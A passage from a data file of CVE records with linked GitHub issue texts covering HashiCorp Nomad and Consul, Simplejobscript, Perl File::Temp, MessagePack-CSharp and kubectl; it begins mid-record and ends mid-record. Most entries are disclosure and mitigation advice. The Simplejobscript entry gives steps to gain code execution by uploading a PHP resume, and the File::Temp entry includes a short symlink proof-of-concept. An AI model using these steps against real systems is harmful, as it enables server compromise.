mutual TLS is not required in order to launch an attack. While successful exploitation of this vulnerability would not affect confidentiality or data integrity within a Nomad deployment, availability would be affected. ## Remediation Users should upgrade to Nomad 0.10.3, or newer. Please refer to [Upgrading Nomad](https://www.nomadproject.io/guides/upgrade/upgrade-specific.html) for general guidance and version-specific upgrade notes. Several new configuration options are introduced (`rpc_max_conns_per_client`, `rpc_handshake_timeout`, `http_max_conns_per_client`, `https_handshake_timeout`) with default values which restrict resource usage and reduce exposure to attack. If upgrade is not possible, customers may consider other mitigation options: * Restrict connectivity to Nomad servers to trusted sources/networks only. TCP [ports used by Nomad](https://www.nomadproject.io/guides/install/production/requirements.html#ports-used) for HTTP and RPC default to 4646 and 4647. * Restrict resource usage on Nomad servers by enforcing network connection limits. For example: ``` iptables -A INPUT -p tcp --syn --dport 4646 -m connlimit --connlimit-above 100 -j REJECT --reject-with tcp-reset ``` Enabling mutual TLS as a defense-in-depth mechanism for Nomad clusters, per documentation, remains strongly recommended.
HTTP/RPC Unbounded Resource Usage, Susceptible to Unauthenticated DoS
https://api.github.com/repos/hashicorp/nomad/issues/7002/comments
1
2020-01-28T19:12:17Z
2022-11-11T02:33:55Z
https://github.com/hashicorp/nomad/issues/7002
556,410,311
7,002
1,057
CVE-2020-7219
2020-01-31T13:15:10.627
HashiCorp Consul and Consul Enterprise up to 1.6.2 HTTP/RPC services allowed unbounded resource usage, and were susceptible to unauthenticated denial of service. Fixed in 1.6.3.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/hashicorp/consul/issues/7159" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.hashicorp.com/blog/category/consul/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/hashicorp/consul/issues/7159" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.hashicorp.com/blog/category/consul/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hashicorp:consul:*:*:*:*:*:*:*:*", "matchCriteriaId": "860E97FE-158E-4C5E-9FBE-6AD01C64EAC5", "versionEndExcluding": "1.6.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:hashicorp:consul:*:*:*:*:enterprise:*:*:*", "matchCriteriaId": "4DADE12B-5A16-41DA-931B-E2E6B7E6C43C", "versionEndExcluding": "1.6.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/hashicorp/consul/issues/7159
[ "Third Party Advisory" ]
github.com
[ "hashicorp", "consul" ]
**Vulnerability ID:** CVE-2020-7219 **Release Date:** January 29, 2020 **Affected Products/Versions:** Previous versions of Consul and Consul Enterprise; fixed in 1.6.3. A vulnerability was identified in Consul and Consul Enterprise (“Consul”) such that unbounded resource usage, triggered by the establishment of many unauthenticated HTTP or RPC connections, may generate excessive load and/or crash the server. This vulnerability affects all previous releases of Consul, and is fixed in the 1.6.3 release. This document outlines details about this vulnerability and describes steps for remediation, as well as options to consider if an upgrade is not possible. ## Background Consul utilizes HTTP for networked communication between Consul cluster members and control/administration of Consul servers. Consul also implements Remote Procedure Call (RPC), a request / response mechanism allowing Consul agents to make a request of a server, which traverses the network between Consul nodes using TCP. Consul’s HTTP and RPC both support using end-to-end TLS with optional client authentication. ## Vulnerability Details An internal security review identified a vulnerability such that it was possible to consume excessive Consul server resources via HTTP and RPC services. A Consul server was exposed to denial of service attack by any party with network-level connectivity to that server. Authentication via mutual TLS is not required in order to launch an attack. This relates to the denial of service property documented in the Consul security model. While successful exploitation of this vulnerability would not affect confidentiality or data integrity within a Consul deployment, availability would be affected. ## Remediation Customers should upgrade to Consul or Consul Enterprise 1.6.3, or newer. Please refer to Upgrading Consul for general guidance and version-specific upgrade notes. Several new configuration options are introduced (`rpc_max_conns_per_client`, `rpc_handshake_timeout`, `http_max_conns_per_client`, `https_handshake_timeout`) with default values which restrict resource usage and reduce exposure to attack. If upgrade is not possible, customers may consider other mitigation options: * Restrict connectivity to Consul servers to trusted sources/networks only. TCP ports used by Consul for HTTP, HTTPS, and RPC default to 8500, 8501, and 8300. * Restrict resource usage on Consul servers by enforcing network connection limits. For example, `iptables -A INPUT -p tcp --syn --dport 8300 -m connlimit --connlimit-above 100 -j REJECT --reject-with tcp-reset`. Enabling TLS for RPC between agents as a defense-in-depth mechanism for Consul clusters, per documentation, remains strongly recommended.
HTTP/RPC Services Allow Unbounded Resource Usage, Susceptible to Unauthenticated Denial of Service
https://api.github.com/repos/hashicorp/consul/issues/7159/comments
0
2020-01-28T23:54:20Z
2020-01-30T18:47:54Z
https://github.com/hashicorp/consul/issues/7159
556,558,525
7,159
1,058
CVE-2020-7955
2020-01-31T13:15:10.813
HashiCorp Consul and Consul Enterprise 1.4.1 through 1.6.2 did not uniformly enforce ACLs across all API endpoints, resulting in potential unintended information disclosure. Fixed in 1.6.3.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/hashicorp/consul/issues/7160" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.hashicorp.com/blog/category/consul/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/hashicorp/consul/issues/7160" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.hashicorp.com/blog/category/consul/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hashicorp:consul:*:*:*:*:*:*:*:*", "matchCriteriaId": "2E0F3B04-5FA5-48EB-BA4A-E698F6790499", "versionEndExcluding": "1.6.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.4.1", "vulnerable": true }, { "criteria": "cpe:2.3:a:hashicorp:consul:*:*:*:*:enterprise:*:*:*", "matchCriteriaId": "7B3761DD-087D-4CD0-AC7F-4ACEEFF9F504", "versionEndExcluding": "1.6.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.4.1", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "863" ]
863
https://github.com/hashicorp/consul/issues/7160
[ "Third Party Advisory" ]
github.com
[ "hashicorp", "consul" ]
**Vulnerability ID:** CVE-2020-7955 **Release Date:** January 29, 2020 **Affected Products/Versions:** Previous versions of Consul and Consul Enterprise; fixed in 1.6.3. A low risk vulnerability was identified in Consul and Consul Enterprise (“Consul”) HTTP API such that the endpoints `v1/agent/health/service/*` did not enforce acl. This vulnerability affects Consul releases 1.4.1 until 1.6.2, and is fixed in 1.6.3 This adds acl enforcement to the two endpoints that were missing it. Note that in the case of getting a services health by its id, we still must first lookup the service so we still "leak" information about a service with that ID existing. There isn't really a way around it though as ACLs are meant to check service names. ## Vulnerability Details Even with an agent with ACLs enabled and with a default “deny” policy, these endpoints still leak some service and check information. The data leaked looks like: ```json [ { "AggregatedStatus": "passing", "Service": { "ID": "web", "Service": "web", "Tags": [], "Meta": {}, "Port": 1234, "Address": "", "Weights": { "Passing": 1, "Warning": 1 }, "EnableTagOverride": false, "Namespace": "default" }, "Checks": [] } ] ``` So in here, we have service names and ids, overall health, ports, any metadata and a list of checks. That list of checks will contain the node name, check name, notes and check output to mention a few things. The only thing that makes this less bad is that the HTTP API is normally served via localhost (although a user can override that). In that case you would have to be on the machine already in order to figure out the service and check info (which would also be found in the data dir of Consul) ## Remediation Customers should upgrade to Consul or Consul Enterprise 1.6.3, or newer. Please refer to Upgrading Consul for general guidance and version-specific upgrade notes.
Add ACL enforcement to the v1/agent/health/service/* endpoints
https://api.github.com/repos/hashicorp/consul/issues/7160/comments
0
2020-01-28T23:54:33Z
2020-01-30T18:47:57Z
https://github.com/hashicorp/consul/issues/7160
556,558,587
7,160
1,059
CVE-2020-7956
2020-01-31T13:15:10.877
HashiCorp Nomad and Nomad Enterprise up to 0.10.2 incorrectly validated role/region associated with TLS certificates used for mTLS RPC, and were susceptible to privilege escalation. Fixed in 0.10.3.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/hashicorp/nomad/issues/7003" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.hashicorp.com/blog/category/nomad/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/hashicorp/nomad/issues/7003" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.hashicorp.com/blog/category/nomad/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hashicorp:nomad:*:*:*:*:*:*:*:*", "matchCriteriaId": "9AD77DCB-A98E-4BB4-89E6-3984A6617B2C", "versionEndExcluding": "0.10.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:hashicorp:nomad:*:*:*:*:enterprise:*:*:*", "matchCriteriaId": "F55BD7DC-1A56-4EBA-990E-16F4E88EF616", "versionEndExcluding": "0.10.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "295" ]
295
https://github.com/hashicorp/nomad/issues/7003
[ "Third Party Advisory" ]
github.com
[ "hashicorp", "nomad" ]
Vulnerability ID: CVE-2020-7956 Versions: Previous versions of Nomad and Nomad Enterprise; fixed in 0.10.3. Nomad 0.10.3 includes a fix for a privilege escalation vulnerability in validating TLS certificates for RPC with mTLS. Nomad RPC endpoints validated that TLS client certificates had not expired and were signed by the same CA as the Nomad node, but did not correctly check the certificate's name for the role and region as described in the Securing Nomad with TLS guide. This allows trusted operators with a client certificate signed by the CA to send RPC calls as a Nomad client or server node, bypassing access control and accessing any secrets available to a client. Nomad clusters configured for mTLS following the Securing Nomad with TLS guide or the Vault PKI Secrets Engine Integration guide should already have certificates that will pass validation. Before upgrading to Nomad 0.10.3, operators using mTLS with verify_server_hostname = true should confirm that the common name or SAN of all Nomad client node certs is client.<region>.nomad, and that the common name or SAN of all Nomad server node certs is server.<region>.nomad.
CVE-2020-7956: Privilege escalation due to incorrect certificate validation for role/region
https://api.github.com/repos/hashicorp/nomad/issues/7003/comments
1
2020-01-28T19:12:39Z
2022-11-11T02:33:53Z
https://github.com/hashicorp/nomad/issues/7003
556,410,504
7,003
1,060
CVE-2020-8440
2020-01-31T14:15:12.077
controllers/page_apply.php in Simplejobscript.com SJS through 1.66 is prone to unauthenticated Remote Code Execution by uploading a PHP script as a resume.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/niteosoft/simplejobscript/issues/10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/niteosoft/simplejobscript/issues/10" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:simplejobscript:simplejobscript:*:*:*:*:*:*:*:*", "matchCriteriaId": "CD8EF221-6FAC-49F7-9589-168A8294E29A", "versionEndExcluding": null, "versionEndIncluding": "1.66", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/niteosoft/simplejobscript/issues/10
[ "Exploit", "Third Party Advisory" ]
github.com
[ "niteosoft", "simplejobscript" ]
**Description:** `controllers/page_apply.php` in simplejobscript.com SJS <=1.66 is prone to unauthenticated Remote Code Execution by uploading a PHP script as a resume. **Environment:** Version: 1.64 OS: Ubuntu 16.10 Web server: Apache 2.4.18 PHP: 5.6.40 Database: MySQL 5.7.28 URL: `/apply` **Steps to Reproduce:** 1/ Apply for a job and attach a PHP file as your resume 2/ Browse the upload directory `http://local.simplejobscript.net/uploads/cvs/` 3/ Run the PHP file **Additional information:** If you can't see the content of the upload directory (directory indexing is off), it can be hard to guess the final filename of your malicious resume because of the `uniqid` generated. However, you can use one of the multiple SQL injection (CVE-2020-7229) then read the content of the table `applicant` or use one of the multiples IDOR available to have access to all applications of all companies. **PoC:** ![sjs_file_upload](https://user-images.githubusercontent.com/5347721/72682077-d97e6c00-3ac9-11ea-986a-2dd6ba48d123.png)
[security] CVE-2020-8440, Unrestricted file upload
https://api.github.com/repos/niteosoft/simplejobscript/issues/10/comments
2
2020-01-19T13:19:49Z
2020-01-29T22:55:43Z
https://github.com/niteosoft/simplejobscript/issues/10
551,921,250
10
1,061
CVE-2011-4116
2020-01-31T18:15:11.343
_is_safe in the File::Temp module for Perl does not properly handle symlinks.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2011/11/04/2" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2011/11/04/4" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://rt.cpan.org/Public/Bug/Display.html?id=69106" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://seclists.org/oss-sec/2011/q4/238" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2011/11/04/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2011/11/04/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://rt.cpan.org/Public/Bug/Display.html?id=69106" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://seclists.org/oss-sec/2011/q4/238" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cpan:file\\:\\:temp:-:*:*:*:*:*:*:*", "matchCriteriaId": "E4523EB2-5331-47E5-BE50-1624EF987D81", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "59" ]
59
https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Perl-Toolchain-Gang", "File-Temp" ]
https://rt.cpan.org/Ticket/Display.html?id=69106 ``` Example... As user "attacker": ln -s /tmp /tmp/exploit As user "victim": perl -MFile::Temp -e 'File::Temp->safe_level(File::Temp::HIGH); print File::Temp::tempdir("/tmp/exploit/meXXXX") . "\n";' The temporary directory path that is returned includes the symlink owned by the "attacker" user. ```
File:Temp::_is_safe() allows unsafe traversal of symlinks [rt.cpan.org #69106]
https://api.github.com/repos/Perl-Toolchain-Gang/File-Temp/issues/14/comments
5
2016-04-03T03:41:22Z
2023-07-09T15:50:06Z
https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14
145,448,983
14
1,062
CVE-2020-5234
2020-01-31T18:15:11.860
MessagePack for C# and Unity before version 1.9.11 and 2.1.90 has a vulnerability where untrusted data can lead to DoS attack due to hash collisions and stack overflow. Review the linked GitHub Security Advisory for more information and remediation steps.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 6.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:C", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/neuecc/MessagePack-CSharp/commit/56fa86219d01d0a183babbbbcb34abbdea588a02" }, { "source": "security-advisories@github.com", "tags": null, "url": "https://github.com/neuecc/MessagePack-CSharp/commit/f88684078698386df02204f13faeff098a61f007" }, { "source": "security-advisories@github.com", "tags": null, "url": "https://github.com/neuecc/MessagePack-CSharp/issues/810" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/neuecc/MessagePack-CSharp/security/advisories/GHSA-7q36-4xx7-xcxf" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/neuecc/MessagePack-CSharp/commit/56fa86219d01d0a183babbbbcb34abbdea588a02" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/neuecc/MessagePack-CSharp/commit/f88684078698386df02204f13faeff098a61f007" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/neuecc/MessagePack-CSharp/issues/810" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/neuecc/MessagePack-CSharp/security/advisories/GHSA-7q36-4xx7-xcxf" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:messagepack:messagepack:*:*:*:*:*:c\\#:*:*", "matchCriteriaId": "6E3E3D7A-9BC4-4387-9EBD-EE1DEE62266D", "versionEndExcluding": "1.9.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:messagepack:messagepack:*:*:*:*:*:c\\#:*:*", "matchCriteriaId": "F24DBCF3-4F9D-4409-9343-7B258B4F1B3F", "versionEndExcluding": "2.1.80", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.0.323", "vulnerable": true }, { "criteria": "cpe:2.3:a:messagepack:messagepack:2.0.94:alpha:*:*:*:c\\#:*:*", "matchCriteriaId": "5507008B-B8F8-4147-8E65-1481E479ABE6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:messagepack:messagepack:2.0.110:alpha:*:*:*:c\\#:*:*", "matchCriteriaId": "37BBAB86-0E12-4B68-A325-C168F7BB2C1C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:messagepack:messagepack:2.0.119:beta:*:*:*:c\\#:*:*", "matchCriteriaId": "C1D65411-111F-4243-AFC7-F561CED839B7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:messagepack:messagepack:2.0.123:beta:*:*:*:c\\#:*:*", "matchCriteriaId": "D61D5CEA-5EB9-4C11-B379-604D8DE9F368", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:messagepack:messagepack:2.0.204:beta:*:*:*:c\\#:*:*", "matchCriteriaId": "129F03B4-C739-4EE9-ADCA-D9DC9337101E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:messagepack:messagepack:2.0.270:rc:*:*:*:c\\#:*:*", "matchCriteriaId": "C6BB270F-6012-4C07-A070-E1F13048A439", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:messagepack:messagepack:2.0.299:rc:*:*:*:c\\#:*:*", "matchCriteriaId": "CB524CF3-98FF-41DF-9C44-553ED740152D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/neuecc/MessagePack-CSharp/issues/810
null
github.com
[ "neuecc", "MessagePack-CSharp" ]
When a `MessagePackSecurity` instance is mutated, the copy constructor doesn't initialize its `objectFallbackEqualityComparer` field, leading to future calls to `MessagePackSecurity.GetEqualityComparer<object>` to return null. What's particularly hazardous about this is that `null` is interpreted by `Dictionary<K,V>` to mean "default comparer" so it defeats the hash collision resistant fixes we made recently.
MessagePackSecurity.GetEqualityComparer<object> returns null on copied instances
https://api.github.com/repos/MessagePack-CSharp/MessagePack-CSharp/issues/810/comments
0
2020-02-07T23:25:01Z
2020-02-10T13:46:21Z
https://github.com/MessagePack-CSharp/MessagePack-CSharp/issues/810
561,922,221
810
1,063
CVE-2019-11251
2020-02-03T16:15:11.140
The Kubernetes kubectl cp command in versions 1.1-1.12, and versions prior to 1.13.11, 1.14.7, and 1.15.4 allows a combination of two symlinks provided by tar output of a malicious container to place a file outside of the destination directory specified in the kubectl cp invocation. This could be used to allow an attacker to place a nefarious file using a symlink, outside of the destination tree.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.6, "source": "jordan@liggitt.net", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", 